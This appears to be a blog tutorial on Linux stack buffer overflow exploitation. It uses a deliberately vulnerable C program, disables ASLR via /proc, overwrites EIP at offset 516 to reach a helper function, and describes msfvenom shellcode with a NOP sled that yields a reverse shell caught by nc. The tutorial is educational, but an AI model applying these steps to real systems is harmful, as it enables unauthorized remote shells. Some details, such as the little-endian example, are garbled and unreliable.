Linux binary exploitation

This the program code :

#include <stdio.h>
#include <unistd.h>

int helper() {
system(“touch pwnd.txt”);
}

int overflow()
{
char buffer[500];
int userinput;
userinput = read(0, buffer, 700);
printf(“\nUser provided %d bytes. Buffer content is: %s\n”, userinput, buffer);
return 0;
}
int main (int argc, char * argv[])
{
overflow();
return 0;
}

You can use gcc to compile it

First thing we need to do to check program security

Ok no protection on the program

Let’s run it in gdb-peda

We can check program function with info function command

Our first task to run helper function and run system(“touch pwnd.txt”); , so let’s check her address , but first you need to disable ASLR with this command

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

ASLR will change the address every time you run the program i will explain later how to bypass it

you need to know memory address work with little endian like :

0x004011b9 will be \xb9\x11\x40\00

now we need to control EIP to make him execute our helper function ,so we can use pattern create to determine which offset overwrite EIP

now we know after 516 buffer we can control EIP , let’s try to run helper function

good it work now let’s try to run shell code instead of run helper function

we can generate shellcode with msfvenom but we need to avoid bad characters it will stop our shell code , so we can use -b for this

now we need to identify EIP,first you need to know ESP is the stack pointer and EIP take address from him

now we know A start with 8 byte from 0xbffff330 we can add them to get EIP address address to control it

we need to add NOP(\x90)no operation before our shell code this will make shell code more stable

let’s run it then check the stack

it work you need to run nc on attacker machine and you will retrieve the reverse shell